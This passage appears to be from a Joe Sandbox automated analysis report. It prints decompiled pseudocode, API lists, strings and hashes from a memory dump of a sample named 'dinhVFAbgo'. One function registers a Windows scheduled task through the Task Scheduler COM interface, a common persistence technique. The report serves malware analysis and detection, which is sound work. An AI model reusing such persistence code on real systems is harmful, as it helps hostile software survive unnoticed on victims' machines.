				signed int _t198;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t209;
				void* _t214;
				signed int _t215;
				intOrPtr* _t218;
				signed int _t223;
				void* _t247;
				signed int _t251;
				intOrPtr* _t256;
				intOrPtr* _t271;
				void* _t274;
				intOrPtr* _t278;
				intOrPtr _t279;
				intOrPtr _t283;
				void* _t287;
				intOrPtr* _t294;
				intOrPtr* _t295;
				intOrPtr* _t303;
				void* _t304;

				_push(0xa0);
				E00DDD52C(0xe0791d, __ebx, __edi, __esi);
				_t214 = __edx;
				_t287 = __ecx;
				if( *0xe89884 != 0) {
					E00CA2822(__edx, __ecx, __eflags);
					_t127 =  *0xe89888; // 0x0
					 *(_t304 - 0x10) =  *(_t304 - 0x10) & 0x00000000;
					_t128 =  *((intOrPtr*)( *_t127 + 0x24))(_t127, 0, _t304 - 0x10);
					_t218 =  *0xe89888; // 0x0
					_t294 = _t128;
					 *((intOrPtr*)( *_t218 + 8))(_t218);
					__eflags = _t294;
					if(_t294 >= 0) {
						_t130 =  *(_t304 - 0x10);
						 *(_t304 - 0x1c) =  *(_t304 - 0x1c) & 0x00000000;
						_t131 =  *((intOrPtr*)( *_t130 + 0x1c))(_t130, _t304 - 0x1c);
						__eflags = _t131;
						if(__eflags >= 0) {
							_push(L"Author Name");
							_t132 = E00CA21CE(__edx, _t304 - 0x14, __ecx, _t294, __eflags);
							 *(_t304 - 4) =  *(_t304 - 4) & 0x00000000;
							_t133 =  *_t132;
							__eflags = _t133;
							if(_t133 == 0) {
								_t271 = 0;
								__eflags = 0;
							} else {
								_t271 =  *_t133;
							}
							_t134 =  *(_t304 - 0x1c);
							_t135 =  *((intOrPtr*)( *_t134 + 0x28))(_t134, _t271);
							 *(_t304 - 4) =  *(_t304 - 4) | 0xffffffff;
							_t295 = _t135;
							E00CA2233(_t135);
							_t223 =  *(_t304 - 0x1c);
							 *((intOrPtr*)( *_t223 + 8))(_t223);
							__eflags = _t295;
							if(_t295 >= 0) {
								_t138 =  *(_t304 - 0x10);
								 *((intOrPtr*)(_t304 - 0x18)) = 0;
								_t139 =  *((intOrPtr*)( *_t138 + 0x3c))(_t138, _t304 - 0x18);
								__eflags = _t139;
								if(_t139 >= 0) {
									_t140 =  *((intOrPtr*)(_t304 - 0x18));
									_t274 = 3;
									 *((intOrPtr*)( *_t140 + 0x38))(_t140, _t274);
									_t142 =  *((intOrPtr*)(_t304 - 0x18));
									 *((intOrPtr*)( *_t142 + 0x48))(_t142, 1);
									_t144 =  *((intOrPtr*)(_t304 - 0x18));
									 *((intOrPtr*)( *_t144 + 8))(_t144);
									_t146 =  *(_t304 - 0x10);
									 *((intOrPtr*)(_t304 - 0x20)) = 0;
									_t147 =  *((intOrPtr*)( *_t146 + 0x24))(_t146, _t304 - 0x20);
									__eflags = _t147;
									if(__eflags >= 0) {
										_t148 =  *((intOrPtr*)(_t304 - 0x20));
										 *((intOrPtr*)(_t304 - 0x24)) = 0;
										 *((intOrPtr*)( *_t148 + 0x28))(_t148, 9, _t304 - 0x24);
										_t150 =  *((intOrPtr*)(_t304 - 0x20));
										 *((intOrPtr*)( *_t150 + 8))(_t150);
										_t152 =  *((intOrPtr*)(_t304 - 0x24));
										 *((intOrPtr*)(_t304 - 0x28)) = 0;
										 *((intOrPtr*)( *_t152))(_t152, 0xe3ff20, _t304 - 0x28);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 - 0x24)))) + 8))();
										_t156 = E00CA21CE(_t214, _t304 - 0x14, _t287, 0, __eflags, L"Trigger1",  *((intOrPtr*)(_t304 - 0x24)));
										 *(_t304 - 4) = 1;
										_t278 =  *_t156;
										__eflags = _t278;
										if(_t278 == 0) {
											_t279 = 0;
										} else {
											_t279 =  *_t278;
										}
										_t157 =  *((intOrPtr*)(_t304 - 0x28));
										_t158 =  *((intOrPtr*)( *_t157 + 0x24))(_t157, _t279);
										 *(_t304 - 4) =  *(_t304 - 4) | 0xffffffff;
										E00CA2233(_t158);
										_t160 =  *((intOrPtr*)(_t304 - 0x28));
										 *((intOrPtr*)( *_t160 + 8))(_t160);
										_t162 =  *(_t304 - 0x10);
										 *((intOrPtr*)(_t304 - 0x2c)) = 0;
										 *((intOrPtr*)( *_t162 + 0x44))(_t162, _t304 - 0x2c);
										_t164 =  *((intOrPtr*)(_t304 - 0x2c));
										 *((intOrPtr*)(_t304 - 0x30)) = 0;
										 *((intOrPtr*)( *_t164 + 0x30))(_t164, 0, _t304 - 0x30);
										_t166 =  *((intOrPtr*)(_t304 - 0x2c));
										 *((intOrPtr*)( *_t166 + 8))(_t166);
										_t168 =  *((intOrPtr*)(_t304 - 0x30));
										 *((intOrPtr*)(_t304 - 0x34)) = 0;
										 *((intOrPtr*)( *_t168))(_t168, 0xe3ff30, _t304 - 0x34);
										_t170 =  *((intOrPtr*)(_t304 - 0x30));
										 *((intOrPtr*)( *_t170 + 8))(_t170);
										_t172 = 3;
										 *((short*)(_t304 - 0x5c)) = _t172;
										 *((intOrPtr*)(_t304 - 0x54)) = 0;
										 *(_t304 - 4) = 2;
										E00CA20F3(_t214, _t304 - 0x5c, _t287, 0, __eflags);
										_t174 = E00CA21CE(_t214, _t304 - 0x14, _t287, 0, __eflags,  *((intOrPtr*)(_t304 - 0x54)), _t214);
										_t215 = 3;
										 *(_t304 - 4) = _t215;
										_t175 =  *_t174;
										__eflags = _t175;
										if(_t175 == 0) {
											_t283 = 0;
										} else {
											_t283 =  *_t175;
										}
										_t176 =  *((intOrPtr*)(_t304 - 0x34));
										_t177 =  *((intOrPtr*)( *_t176 + 0x2c))(_t176, _t283);
										 *(_t304 - 4) = 2;
										E00CA2233(_t177);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 - 0x34)))) + 8))();
										 *((intOrPtr*)(_t304 - 0x3c)) = 0;
										 *(_t304 - 0x4c) = _t215;
										 *((intOrPtr*)(_t304 - 0x44)) = 0;
										_t247 = _t304 - 0x4c;
										 *(_t304 - 4) = 4;
										E00CA20F3(_t215, _t247, _t287, 0, __eflags, _t287,  *((intOrPtr*)(_t304 - 0x34)));
										_t182 = E00CA22D7(_t215, _t304 - 0xac, _t287, 0);
										 *(_t304 - 0x14) =  *(_t304 - 0x14) & 0x00000000;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										 *(_t304 - 4) = 6;
										_t184 = E00CA228C(_t215, _t304 - 0x9c, _t304 - 0x6c, _t182, _t304 - 0x14);
										 *(_t304 - 0x38) =  *(_t304 - 0x38) & 0x00000000;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										 *(_t304 - 4) = 8;
										E00CA228C(_t215, _t304 - 0x8c, _t304 - 0x7c, _t184, _t304 - 0x38);
										 *(_t304 - 4) = 9;
										_t251 =  *0xe89884; // 0x0
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										 *((intOrPtr*)( *_t251 + 0x44))(_t251,  *((intOrPtr*)(_t304 - 0x44)),  *(_t304 - 0x10), 6, _t215, _t304 - 0x3c, _t247);
										_t303 = __imp__#9;
										E00CA2233( *_t303(_t304 - 0x8c));
										E00CA2233( *_t303(_t304 - 0x9c));
										 *(_t304 - 4) = 4;
										 *_t303(_t304 - 0xac);
										_t196 =  *0xe89884; // 0x0
										 *((intOrPtr*)( *_t196 + 8))(_t196);
										_t198 =  *(_t304 - 0x10);
										 *((intOrPtr*)( *_t198 + 8))(_t198);
										_t256 =  *((intOrPtr*)(_t304 - 0x3c));
										 *((intOrPtr*)( *_t256 + 8))(_t256);
										__imp__CoUninitialize();
										 *_t303(_t304 - 0x4c);
										 *_t303(_t304 - 0x5c);
										_t204 = 1;
										__eflags = 1;
									} else {
										_push(_t147);
										_push("\nCannot get trigger collection: %x");
										goto L7;
									}
								} else {
									E00CA1FB7("pTaskDefinition::get_Principal", _t139);
									goto L1;
								}
							} else {
								_push(_t295);
								_push("\nCannot put identification info: %x");
								goto L7;
							}
						} else {
							_push(_t131);
							_push("\nCannot get identification pointer: %x");
							L7:
							E00CA1FB7();
							_t207 =  *0xe89884; // 0x0
							 *((intOrPtr*)( *_t207 + 8))(_t207);
							_t209 =  *(_t304 - 0x10);
							goto L4;
						}
					} else {
						E00CA1FB7("Failed to CoCreate an instance of the TaskService class: %x", _t294);
						_t209 =  *0xe89884; // 0x0
						L4:
						 *((intOrPtr*)( *_t209 + 8))(_t209);
						__imp__CoUninitialize();
						goto L1;
					}
				} else {
					L1:
					_t204 = 0;
				}
				return E00DDD4FA(_t204);
			}

0x00ca24ab
0x00ca24b5
0x00ca24ba
0x00ca24bc
0x00ca24c5
0x00ca24ce
0x00ca24d3
0x00ca24db
0x00ca24e5
0x00ca24e8
0x00ca24ee
0x00ca24f3
0x00ca24f6
0x00ca24f8
0x00ca251a
0x00ca2520
0x00ca2528
0x00ca252b
0x00ca252d
0x00ca254c
0x00ca2554
0x00ca2559
0x00ca255d
0x00ca255f
0x00ca2561
0x00ca2567
0x00ca2567
0x00ca2563
0x00ca2563
0x00ca2563
0x00ca2569
0x00ca2570
0x00ca2573
0x00ca257a
0x00ca257c
0x00ca2581
0x00ca2587
0x00ca258a
0x00ca258c
0x00ca2596
0x00ca259e
0x00ca25a5
0x00ca25a8
0x00ca25aa
0x00ca25be
0x00ca25c3
0x00ca25c8
0x00ca25cb
0x00ca25d3
0x00ca25d6
0x00ca25dc
0x00ca25df
0x00ca25e5
0x00ca25ec
0x00ca25ef
0x00ca25f1
0x00ca25fe
0x00ca2605
0x00ca260d
0x00ca2610
0x00ca2616
0x00ca2619
0x00ca2620
0x00ca262b
0x00ca2633
0x00ca263e
0x00ca2643
0x00ca264a
0x00ca264c
0x00ca264e
0x00ca2654
0x00ca2650
0x00ca2650
0x00ca2650
0x00ca2656
0x00ca265d
0x00ca2660
0x00ca2667
0x00ca266c
0x00ca2672
0x00ca2675
0x00ca267b
0x00ca2682
0x00ca2685
0x00ca268c
0x00ca2693
0x00ca2696
0x00ca269c
0x00ca269f
0x00ca26a6
0x00ca26b1
0x00ca26b3
0x00ca26b9
0x00ca26be
0x00ca26bf
0x00ca26c3
0x00ca26ca
0x00ca26d1
0x00ca26dc
0x00ca26e3
0x00ca26e4
0x00ca26e7
0x00ca26e9
0x00ca26eb
0x00ca26f1
0x00ca26ed
0x00ca26ed
0x00ca26ed
0x00ca26f3
0x00ca26fa
0x00ca2700
0x00ca2704
0x00ca270f
0x00ca2712
0x00ca2715
0x00ca2719
0x00ca271d
0x00ca2720
0x00ca2724
0x00ca2730
0x00ca2735
0x00ca273e
0x00ca273f
0x00ca2740
0x00ca2741
0x00ca2745
0x00ca2750
0x00ca2755
0x00ca275e
0x00ca275f
0x00ca2760
0x00ca2761
0x00ca2765
0x00ca2770
0x00ca2775
0x00ca2780
0x00ca278c
0x00ca2792
0x00ca2793
0x00ca2794
0x00ca279d
0x00ca279e
0x00ca279f
0x00ca27a0
0x00ca27aa
0x00ca27ab
0x00ca27ac
0x00ca27ad
0x00ca27b2
0x00ca27b5
0x00ca27c7
0x00ca27d8
0x00ca27e3
0x00ca27e8
0x00ca27ea
0x00ca27f2
0x00ca27f5
0x00ca27fb
0x00ca27fe
0x00ca2804
0x00ca2807
0x00ca2811
0x00ca2817
0x00ca281b
0x00ca281b
0x00ca25f3
0x00ca25f3
0x00ca25f4
0x00000000
0x00ca25f4
0x00ca25ac
0x00ca25b2
0x00000000
0x00ca25b8
0x00ca258e
0x00ca258e
0x00ca258f
0x00000000
0x00ca258f
0x00ca252f
0x00ca252f
0x00ca2530
0x00ca2535
0x00ca2535
0x00ca253a
0x00ca2544
0x00ca2547
0x00000000
0x00ca2547
0x00ca24fa
0x00ca2500
0x00ca2505
0x00ca250c
0x00ca250f
0x00ca2512
0x00000000
0x00ca2512
0x00ca24c7
0x00ca24c7
0x00ca24c7
0x00ca24c7
0x00ca2821

APIs

__EH_prolog3.LIBCMT ref: 00CA24B5
CoUninitialize.OLE32 ref: 00CA2512

Part of subcall function 00CA21CE: __EH_prolog3.LIBCMT ref: 00CA21D5
Part of subcall function 00CA21CE: SysAllocString.OLEAUT32(?), ref: 00CA21FF

Part of subcall function 00CA228C: SysStringByteLen.OLEAUT32(?), ref: 00CA22A9
Part of subcall function 00CA228C: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 00CA22B1

VariantClear.OLEAUT32(?), ref: 00CA27C2
VariantClear.OLEAUT32(?), ref: 00CA27D3
VariantClear.OLEAUT32(?), ref: 00CA27E8
CoUninitialize.OLE32 ref: 00CA2807
VariantClear.OLEAUT32(?), ref: 00CA2811
VariantClear.OLEAUT32(?), ref: 00CA2817

Strings

Cannot get trigger collection: %x, xrefs: 00CA25F4
Cannot get identification pointer: %x, xrefs: 00CA2530
Cannot put identification info: %x, xrefs: 00CA258F
Failed to CoCreate an instance of the TaskService class: %x, xrefs: 00CA24FB
Author Name, xrefs: 00CA254C
Trigger1, xrefs: 00CA2636
pTaskDefinition::get_Principal, xrefs: 00CA25AD

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClearVariant$String$AllocByteH_prolog3Uninitialize
String ID: Cannot get identification pointer: %x$Cannot get trigger collection: %x$Cannot put identification info: %x$Author Name$Failed to CoCreate an instance of the TaskService class: %x$Trigger1$pTaskDefinition::get_Principal
API String ID: 1448242033-3733272735
Opcode ID: 73d7e3f27eee2c3a764e8ea0b76a1eb7efccda4220866b710e11cdcfcc686494
Instruction ID: 2c1036b815c4b5be43770c1ac165cc357a09146f85240c033c655d5b1610b50a
Opcode Fuzzy Hash: 73d7e3f27eee2c3a764e8ea0b76a1eb7efccda4220866b710e11cdcfcc686494
Instruction Fuzzy Hash: FFD10B71E002199FCB14DFA8C859EAEBBB9FF4A714F144158F405AB251DB71AE05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D230C2 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00D230C2(void* __ebx, void* __ecx, void* __edx, RECT* __edi, void* __esi, void* __eflags) {
				int _t112;
				void* _t116;
				intOrPtr _t117;
				intOrPtr _t124;
				void* _t129;
				struct HMONITOR__* _t139;
				struct tagRECT _t145;
				intOrPtr _t158;
				void* _t164;
				intOrPtr _t167;
				void* _t169;
				void* _t171;
				void* _t173;
				void* _t175;
				intOrPtr _t190;
				void* _t204;
				struct tagMONITORINFO* _t205;
				struct tagRECT _t206;
				intOrPtr _t212;
				void* _t214;
				intOrPtr _t215;
				void* _t217;
				intOrPtr* _t224;
				intOrPtr _t225;
				intOrPtr _t226;
				void* _t229;

				_t209 = __edi;
				_t204 = __edx;
				_push(0x68);
				E00DDD55F(0xe0d443, __ebx, __edi, __esi);
				_t173 = __ecx;
				_t220 =  *((intOrPtr*)(_t229 + 0x18));
				 *((intOrPtr*)(_t229 - 0x5c)) =  *((intOrPtr*)(_t229 + 0x18));
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					L37:
					return E00DDD50E(_t173, _t209, _t220);
				} else {
					_t209 = __ecx + 0x84;
					_t112 = EqualRect(__ecx + 0x84, _t229 + 8);
					_t175 = _t173 + 0x80;
					if(_t112 == 0) {
						L5:
						_t221 = _t229 + 8;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E00CA68A8(_t175,  *((intOrPtr*)(_t229 - 0x5c)));
						_push(_t173);
						_t176 = _t229 - 0x74;
						E00CB8FDD(_t173, _t229 - 0x74, _t204, _t209, _t229 + 8, _t236);
						_t115 =  *((intOrPtr*)(_t173 + 0x98));
						 *((intOrPtr*)(_t229 - 4)) = 0;
						if( *((intOrPtr*)(_t173 + 0x98)) != 0) {
							_t116 = E00CB9E25(_t173, _t176, _t204, 0, _t221, __eflags, _t115);
							_t177 = _t229 - 0x74;
							_t117 = E00CBA2B8(_t229 - 0x74, _t116);
						} else {
							_t177 = _t229 - 0x74;
							_t117 = E00CBA32D(_t229 - 0x74, 0x11);
						}
						 *((intOrPtr*)(_t229 - 0x5c)) = _t117;
						if(_t117 == 0) {
							E00CAA4E7(_t173, _t177, 0, _t221, __eflags);
							asm("int3");
							E00DDD52C(0xe0d488, _t173, 0, _t221);
							 *(_t229 - 0x10) = 0;
							 *((intOrPtr*)(_t229 - 4)) = 0;
							E00D52263(_t173, 0, _t221, __eflags,  *(_t229 + 8),  *((intOrPtr*)(_t177 + 0xd4)), 0, 4);
							 *((intOrPtr*)(_t229 - 4)) = 0;
							_t212 =  *((intOrPtr*)(_t229 + 0xc));
							 *(_t229 - 0x10) = 1;
							__eflags = _t212;
							if(_t212 != 0) {
								_t124 = E00DEC1A0(_t212);
								__eflags = _t124;
								if(_t124 != 0) {
									_push(E00DEC1A0(_t212));
									E00CA93E8(_t173,  *(_t229 + 8), _t212, _t212);
									_push(E00DEC1A0(0xe19188));
									E00CA93E8(_t173,  *(_t229 + 8), 0xe19188, 0xe19188);
								}
							}
							return E00DDD4FA( *(_t229 + 8));
						} else {
							 *((intOrPtr*)(_t229 - 0x60)) =  *((intOrPtr*)(_t229 + 0x14)) -  *((intOrPtr*)(_t229 + 0xc));
							_t224 = _t173 + 0x80;
							_t129 = E00DEC2D7( *_t224, "\n");
							if(_t129 == 0 || _t129 -  *_t224 == 0xffffffff) {
								_t214 =  *((intOrPtr*)(E00CBAFB7(_t229 - 0x74, _t229 - 0x28, _t224))) +  *(_t173 + 0x94) * 2;
							} else {
								_t164 = E00CC19ED();
								 *((intOrPtr*)(_t229 - 0x24)) =  *((intOrPtr*)(_t164 + 0x1cc));
								 *((intOrPtr*)(_t229 - 0x30)) = 0;
								 *((intOrPtr*)(_t229 - 0x2c)) = 0;
								 *((intOrPtr*)(_t229 - 0x28)) = 0xc8;
								_t167 =  *((intOrPtr*)(_t173 + 0x80));
								 *0xe17a64(_t167,  *((intOrPtr*)(_t167 - 0xc)), _t229 - 0x30, 0x410);
								_t169 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t229 - 0x74)) + 0x68))))();
								_t217 =  *(_t173 + 0x94) +  *(_t173 + 0x94);
								_t214 = _t217 -  *((intOrPtr*)(_t229 - 0x30)) +  *((intOrPtr*)(_t229 - 0x28));
								 *((intOrPtr*)(_t229 - 0x60)) = _t169 + _t217;
							}
							E00CBA2B8(_t229 - 0x74,  *((intOrPtr*)(_t229 - 0x5c)));
							if((E00CB7738( *((intOrPtr*)(_t173 + 0x9c))) & 0x00400000) == 0) {
								_t205 =  *(_t229 + 8);
								 *((intOrPtr*)(_t229 + 0x10)) = _t205 + _t214;
							} else {
								_t205 =  *((intOrPtr*)(_t229 + 0x10)) - _t214;
								 *(_t229 + 8) = _t205;
							}
							_t225 =  *((intOrPtr*)(_t229 + 0xc));
							_t190 =  *((intOrPtr*)(_t229 - 0x60)) + _t225;
							 *((intOrPtr*)(_t229 + 0x14)) = _t190;
							if(_t190 - _t225 <  *((intOrPtr*)(_t173 + 0x90)) -  *((intOrPtr*)(_t173 + 0x88))) {
								_t225 =  *((intOrPtr*)(_t173 + 0x88));
								 *((intOrPtr*)(_t229 + 0xc)) = _t225;
								 *((intOrPtr*)(_t229 + 0x14)) =  *((intOrPtr*)(_t173 + 0x90));
							}
							 *(_t229 - 0x58) = 0x28;
							 *(_t229 - 0x20) = 0;
							 *((intOrPtr*)(_t229 - 0x1c)) = 0;
							 *((intOrPtr*)(_t229 - 0x18)) = 0;
							 *((intOrPtr*)(_t229 - 0x14)) = 0;
							_t139 = _t229 - 0x58;
							__imp__MonitorFromPoint(_t225, 2, _t139);
							if(GetMonitorInfoA(_t139, _t205) == 0) {
								SystemParametersInfoA(0x30, 0, _t229 - 0x20, 0);
							} else {
								CopyRect(_t229 - 0x20, _t229 - 0x44);
							}
							_t226 =  *((intOrPtr*)(_t229 + 0x10));
							_t206 =  *(_t229 + 8);
							 *((intOrPtr*)(_t229 - 0x5c)) = _t226;
							if(_t226 - _t206 <=  *((intOrPtr*)(_t229 - 0x18)) -  *(_t229 - 0x20)) {
								__eflags = _t226 -  *((intOrPtr*)(_t229 - 0x18));
								if(_t226 <=  *((intOrPtr*)(_t229 - 0x18))) {
									_t145 =  *(_t229 - 0x20);
									__eflags = _t206 - _t145;
									if(_t206 < _t145) {
										_t206 = _t145;
										_t158 = _t145 + _t214;
										__eflags = _t158;
										goto L27;
									}
								} else {
									_t158 =  *((intOrPtr*)(_t229 - 0x18));
									_t206 = _t158 - _t214;
									goto L27;
								}
							} else {
								_t206 =  *(_t229 - 0x20);
								_t158 =  *((intOrPtr*)(_t229 - 0x18));
								L27:
								 *(_t229 + 8) = _t206;
								 *((intOrPtr*)(_t229 - 0x5c)) = _t158;
								 *((intOrPtr*)(_t229 + 0x10)) = _t158;
							}
							_t215 =  *((intOrPtr*)(_t229 + 0x14));
							_t220 =  *((intOrPtr*)(_t229 + 0xc));
							if(_t215 - _t220 <=  *((intOrPtr*)(_t229 - 0x14)) -  *((intOrPtr*)(_t229 - 0x1c))) {
								__eflags = _t215 -  *((intOrPtr*)(_t229 - 0x14));
								if(_t215 <=  *((intOrPtr*)(_t229 - 0x14))) {
									__eflags = _t220 -  *((intOrPtr*)(_t229 - 0x1c));
									if(_t220 <  *((intOrPtr*)(_t229 - 0x1c))) {
										_t215 = _t215 +  *((intOrPtr*)(_t229 - 0x60));
										__eflags = _t215;
										goto L34;
									}
								} else {
									_t215 =  *((intOrPtr*)(_t229 - 0x14));
									_t220 = _t215 -  *((intOrPtr*)(_t229 - 0x60));
									goto L35;
								}
							} else {
								_t215 =  *((intOrPtr*)(_t229 - 0x14));
								L34:
								_t220 =  *((intOrPtr*)(_t229 - 0x1c));
								L35:
								 *((intOrPtr*)(_t229 + 0xc)) = _t220;
								 *((intOrPtr*)(_t229 + 0x14)) = _t215;
							}
							_t209 = _t215 - _t220;
							E00CB7A83(_t173, 0xe86aa8, _t206, _t220,  *((intOrPtr*)(_t229 - 0x5c)) - _t206, _t215 - _t220, 0x210);
							E00CB7B32(_t173, 4);
							InvalidateRect( *(_t173 + 0x20), 0, 1);
							UpdateWindow( *(_t173 + 0x20));
							E00CACEEE(_t173, _t215 - _t220, _t220,  *((intOrPtr*)(_t229 - 0x5c)) - _t206);
							SetCursor(LoadCursorA(0, 0x7f00));
							E00CB9150(_t229 - 0x74);
							goto L37;
						}
					} else {
						_t171 = E00CBFB0A(_t173, _t209, _t220, _t175, _t220);
						_t236 = _t171;
						if(_t171 != 0) {
							goto L37;
						} else {
							_t175 = _t173 + 0x80;
							goto L5;
						}
					}
				}
			}

0x00d230c2
0x00d230c2
0x00d230c2
0x00d230c9
0x00d230ce
0x00d230d0
0x00d230d3
0x00d230d8
0x00d23380
0x00d23385
0x00d230e8
0x00d230ec
0x00d230f3
0x00d230f9
0x00d23101
0x00d2311a
0x00d2311d
0x00d23120
0x00d23121
0x00d23122
0x00d23123
0x00d23124
0x00d23129
0x00d2312a
0x00d2312d
0x00d23132
0x00d2313a
0x00d2313f
0x00d2314e
0x00d23154
0x00d23157
0x00d23141
0x00d23143
0x00d23146
0x00d23146
0x00d2315c
0x00d23161
0x00d23388
0x00d2338d
0x00d23395
0x00d2339c
0x00d233a6
0x00d233ac
0x00d233b4
0x00d233b7
0x00d233ba
0x00d233c1
0x00d233c3
0x00d233c6
0x00d233cc
0x00d233ce
0x00d233da
0x00d233dc
0x00d233f0
0x00d233f2
0x00d233f2
0x00d233ce
0x00d233ff
0x00d23167
0x00d2316d
0x00d23170
0x00d2317d
0x00d23186
0x00d231fa
0x00d2318f
0x00d2318f
0x00d231a3
0x00d231a9
0x00d231ac
0x00d231af
0x00d231bb
0x00d231c5
0x00d231ce
0x00d231d6
0x00d231dd
0x00d231e0
0x00d231e0
0x00d23203
0x00d23218
0x00d23224
0x00d2322a
0x00d2321a
0x00d2321d
0x00d2321f
0x00d2321f
0x00d2322d
0x00d23239
0x00d23241
0x00d23248
0x00d2324a
0x00d23256
0x00d23259
0x00d23259
0x00d2325e
0x00d23265
0x00d23268
0x00d2326b
0x00d2326e
0x00d23271
0x00d23279
0x00d23288
0x00d232a4
0x00d2328a
0x00d23292
0x00d23292
0x00d232aa
0x00d232b2
0x00d232ba
0x00d232bf
0x00d232c9
0x00d232cc
0x00d232d7
0x00d232da
0x00d232dc
0x00d232de
0x00d232e0
0x00d232e0
0x00000000
0x00d232e0
0x00d232ce
0x00d232ce
0x00d232d3
0x00000000
0x00d232d3
0x00d232c1
0x00d232c1
0x00d232c4
0x00d232e2
0x00d232e2
0x00d232e5
0x00d232e8
0x00d232e8
0x00d232eb
0x00d232f3
0x00d232fd
0x00d23304
0x00d23307
0x00d23313
0x00d23316
0x00d23318
0x00d23318
0x00000000
0x00d23318
0x00d23309
0x00d23309
0x00d2330e
0x00000000
0x00d2330e
0x00d232ff
0x00d232ff
0x00d2331b
0x00d2331b
0x00d2331e
0x00d2331e
0x00d23321
0x00d23321
0x00d23327
0x00d2333b
0x00d23344
0x00d23350
0x00d23359
0x00d2335f
0x00d23372
0x00d2337b
0x00000000
0x00d2337b
0x00d23103
0x00d23105
0x00d2310c
0x00d2310e
0x00000000
0x00d23114
0x00d23114
0x00000000
0x00d23114
0x00d2310e
0x00d23101

APIs

__EH_prolog3_GS.LIBCMT ref: 00D230C9
EqualRect.USER32 ref: 00D230F3
MonitorFromPoint.USER32(?,00000000,00000002), ref: 00D23279
GetMonitorInfoA.USER32 ref: 00D23280

Part of subcall function 00CBA2B8: SelectObject.GDI32(?,00000000), ref: 00CBA2DC
Part of subcall function 00CBA2B8: SelectObject.GDI32(?,00000000), ref: 00CBA2F4

Part of subcall function 00CBAFB7: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00CBAFCC

CopyRect.USER32 ref: 00D23292
SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 00D232A4
InvalidateRect.USER32(00000000,00000000,00000001,00000004,00E86AA8,?,?,?,00CD2177,00000210), ref: 00D23350
UpdateWindow.USER32(00000000), ref: 00D23359
LoadCursorA.USER32 ref: 00D2336B
SetCursor.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00D23372
__EH_prolog3.LIBCMT ref: 00D23395
_strlen.LIBCMT ref: 00D233C6
_strlen.LIBCMT ref: 00D233D1
_strlen.LIBCMT ref: 00D233E7

Strings

(, xrefs: 00D2325E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect_strlen$CursorInfoMonitorObjectSelect$CopyEqualExtentFromH_prolog3H_prolog3_InvalidateLoadParametersPointPoint32SystemTextUpdateWindow
String ID: (
API String ID: 3262295292-3887548279
Opcode ID: 82d1a1a45ac401768edc0e1dc0b0b98a01edf4efb7d3deccdbb38d1239ec7ea8
Instruction ID: d342614c0ef589bcaec39d48a890d53b27f691f8aaedb42ff25c6b697c49c124
Opcode Fuzzy Hash: 82d1a1a45ac401768edc0e1dc0b0b98a01edf4efb7d3deccdbb38d1239ec7ea8
Instruction Fuzzy Hash: 23B16E719002199FCF00DFA9D885AEEBBB5FF94314F148129F909BB255DB34AA45CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF150 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 232
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00CCF150(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, signed int* _a4, char _a8) {
				intOrPtr _v0;
				signed int _v8;
				struct tagRECT _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				intOrPtr _v72;
				void* _v76;
				signed int _v80;
				signed int _t78;
				signed int* _t81;
				signed int _t83;
				signed int _t108;
				signed int* _t123;
				signed int _t133;
				signed int _t141;
				int _t145;
				void* _t146;
				signed int _t147;
				intOrPtr _t166;
				void* _t174;
				intOrPtr* _t175;
				intOrPtr _t179;
				void* _t181;
				intOrPtr* _t183;
				intOrPtr _t184;
				signed int _t194;
